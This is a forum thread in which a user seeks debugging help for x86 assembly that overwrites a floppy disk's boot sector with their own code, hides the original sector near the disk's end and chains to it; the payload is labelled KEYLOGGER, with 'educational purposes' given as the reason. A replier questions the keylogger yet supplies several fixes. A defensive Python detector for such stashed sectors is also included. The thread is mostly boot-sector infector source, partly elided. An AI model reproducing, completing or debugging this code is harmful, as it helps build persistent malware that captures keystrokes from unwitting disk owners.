
install code at boot sector of floppy

Posted: Thu Sep 20, 2018 12:14 am
by bruninho
I am trying to install my code onto the boot sector, however the floppy disk doesn't boot with my code injected. Here is part of my source:

Code:

mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h

LEA DI,[SETOR+3EH]
MOV SI,CODE
MOV CX,1C0h
REP MOVSB

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es

;push cx
;push dx

sub cl,6
;lea bx,[setor+3Eh]
mov bx,SETOR
mov ax,301h
mov dl,0h
int 13h

;pop dx
;pop cx

mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H

ret

CODE:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf
cli
IN AL,64H
...

What is wrong with my source above?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 1:14 am
by Octocontrabass
How do you know the problem is with the code you've shown here, and not something else?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 1:33 am
by bruninho
Octocontrabass wrote: How do you know the problem is with the code you've shown here, and not something else?

Because the OS should just boot from this code at the bootstrap sector.

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 1:39 am
by Octocontrabass
Have you checked the disk using a hex editor to see if your code was successfully written to the disk?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 1:44 am
by bruninho
Octocontrabass wrote: Have you checked the disk using a hex editor to see if your code was successfully written to the disk?

Yes. The boot sector was modified, however it is not written at the last sector - 6, which should be saved at the end of the disk.

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 1:57 am
by Octocontrabass
Check the return values from the INT 0x13 call. Does the BIOS say the write was successful?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 2:13 am
by bruninho
Octocontrabass wrote: Check the return values from the INT 0x13 call. Does the BIOS say the write was successful?

I already checked the values in the AH register and the INT 13h write was successful. I am already afraid because I don't understand what is happening.

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 2:16 am
by bruninho
I think the error is:

Code:

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
INT 13H
MOV AX,301H
MOV CX,1
INT 13H
MOV DL,0
INT 19H

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 2:21 am
by Octocontrabass
Are you trying to back up and restore the original boot sector? You're not backing up the original boot sector, so you can't restore it.

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 2:28 am
by bruninho
Octocontrabass wrote: Are you trying to back up and restore the original boot sector? You're not backing up the original boot sector, so you can't restore it.

Yes, I write the original bootstrap sector at the 6 last sectors.

Why do you say that I don't back up the 1st sector?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 2:46 am
by Octocontrabass
Because you never write the original first sector back to the disk.
  1. You read the first sector to a buffer in memory
  2. You modify the buffer
  3. You write the modified buffer to a sector near the end of the disk
  4. You write the modified buffer to the first sector
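
A defender's view of the four steps listed above, as an added example that is not part of the original thread: a heuristic check of a floppy image for a copy of the boot sector saved near the end of the disk. The 1.44 MB geometry, the 36-sector tail window, the function names and the sample images are constructed assumptions.

```python
import struct

SECTOR = 512
CODE_START, CODE_END = 0x3E, 0x1FE   # boot code area between the BPB and the signature
SIGNATURE = b"\x55\xaa"

def find_stashed_boot_sectors(image, tail_sectors=36):
    """Heuristic: report sectors near the end of the image that carry the boot
    signature and the same BPB as sector 0, i.e. look like a saved boot sector."""
    boot = image[:SECTOR]
    if len(boot) < SECTOR or boot[CODE_END:] != SIGNATURE:
        raise ValueError("sector 0 has no boot signature")
    total = len(image) // SECTOR
    findings = []
    for lba in range(max(1, total - tail_sectors), total):
        cand = image[lba * SECTOR:(lba + 1) * SECTOR]
        if cand[CODE_END:] == SIGNATURE and cand[:CODE_START] == boot[:CODE_START]:
            # Same BPB but different code means sector 0 was rewritten afterwards.
            differs = cand[CODE_START:CODE_END] != boot[CODE_START:CODE_END]
            findings.append({"lba": lba, "code_differs": differs})
    return findings

# --- constructed sample data (not taken from a real disk) ---
def make_boot_sector(code_fill):
    """Build a 1.44 MB FAT12-style boot sector whose code area is one repeated byte."""
    head = b"\xeb\x3c\x90" + b"SAMPLE  " + struct.pack(
        "<HBHBHHBHHH", 512, 1, 1, 2, 224, 2880, 0xF0, 9, 18, 2)
    return head.ljust(CODE_START, b"\x00") + bytes([code_fill]) * (CODE_END - CODE_START) + SIGNATURE

def make_image(boot, stash=None, stash_lba=2873):
    img = bytearray(2880 * SECTOR)
    img[:SECTOR] = boot
    if stash is not None:
        img[stash_lba * SECTOR:(stash_lba + 1) * SECTOR] = stash
    return bytes(img)

CLEAN = make_image(make_boot_sector(0xF4))
TAMPERED = make_image(make_boot_sector(0x90), stash=make_boot_sector(0xF4))

if __name__ == "__main__":
    for name, img in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, find_stashed_boot_sectors(img))
```

A hit with `code_differs` set is a reason to compare sector 0 against a known-good boot sector for that format, not proof of tampering on its own.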

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 3:43 am
by bruninho
I've modified my source code, however it doesn't solve my problem. The operating system doesn't bootstrap with this source:

Code:


mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov ax,301h
sub cl,6
mov dl,0
mov bx,SETOR
INT 13H

LEA DI,[SETOR+3EH]
MOV SI,KEYLOGGER
MOV CX,1C0h
REP MOVSB

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H

ret

CODE:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf

.............

IN AL,64H

.............

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
INT 13H
MOV DL,0
MOV AX,301H
MOV CX,1
;CS
MOV BX,SETOR
INT 13H
MOV DL,0
INT 19H

BUF db 2048 dup (0)
SETOR  db 512 dup(0)

What should I do?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 4:11 am
by Octocontrabass
Why are you writing a keylogger?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 4:22 am
by bruninho
Octocontrabass wrote: Why are you writing a keylogger?

For educational purposes.

See my source that still doesn't work:

Code:


mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov ax,301h
sub cl,6
mov dl,0
mov bx,SETOR
INT 13H

LEA DI,[SETOR+3EH]
MOV SI,KEYLOGGER
MOV CX,1C0h
REP MOVSB

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H

ret

KEYLOGGER:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf



IN AL,64H



mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
MOV BX,SETOR
INT 13H
MOV DL,0
MOV AX,301H
MOV CX,1
;CS
MOV BX,SETOR
INT 13H
MOV DL,0
INT 19H

BUF db 2048 dup (0)
SETOR  db 512 dup(0)

And it still doesn't bootstrap from the floppy disk. Why?

Re: install code at boot sector of floppy

Posted: Thu Sep 20, 2018 5:08 am
by Octocontrabass

Code:

mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h

Any MOV to SS must be followed immediately by a MOV to SP. Having instructions between them can cause issues.

Code:

push 61Ch

Are you sure this is the right value? Perhaps you should use label arithmetic to come up with it instead. (Also, since the address is a constant, you can use a far JMP instead of a far RET.)

Code:

push es
mov es,di
pop es
INT 13H

I think you copy-pasted this code in the wrong order.

Code:

MOV BX,SETOR

Will this label evaluate to a reasonable address if you use it inside your "keylogger"?